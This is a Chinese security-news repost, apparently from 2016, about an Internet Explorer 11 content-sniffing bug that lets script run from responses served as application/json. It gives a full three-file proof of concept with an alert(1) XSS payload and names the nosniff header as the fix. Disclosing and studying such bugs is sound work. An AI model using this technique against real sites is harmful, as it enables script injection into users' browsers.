记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

在application/json,application/javascript等Response下进行XSS

2016-12-26 23:50

via:Mramydnei

前不久在日本比较著名的XSS会议ShibuyaXSS上,著名漏洞猎人,Cure53成员Masato kinugawa
在会议上分享了个比较有趣的Internet Explorer的BUG。借助该BUG可以在application
/xx的response下优雅的完成XSS攻击。

POC.htm

<meta charset=utf-8>
<iframe id=x src=redirect.php></iframe>
<script>
x.location.reload();
</script>

redirect.php

<?php
header("location: json.php");
?>

json.php

<?php header("Content-Type: application/json"); ?>
<img src=x onerror=alert(1)>

测试于Windows7/Internet Explorer 11

解决方案:
设置X-Content-Type-Options头 -> header(‘X-Content-Type-Options: nosniff’);

知识来源: www.91ri.org/16545.html

阅读:125459 | 评论:0 | 标签:WEB安全 xss

想收藏或者和大家分享这篇好文章→复制链接地址

“在application/json,application/javascript等Response下进行XSS”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词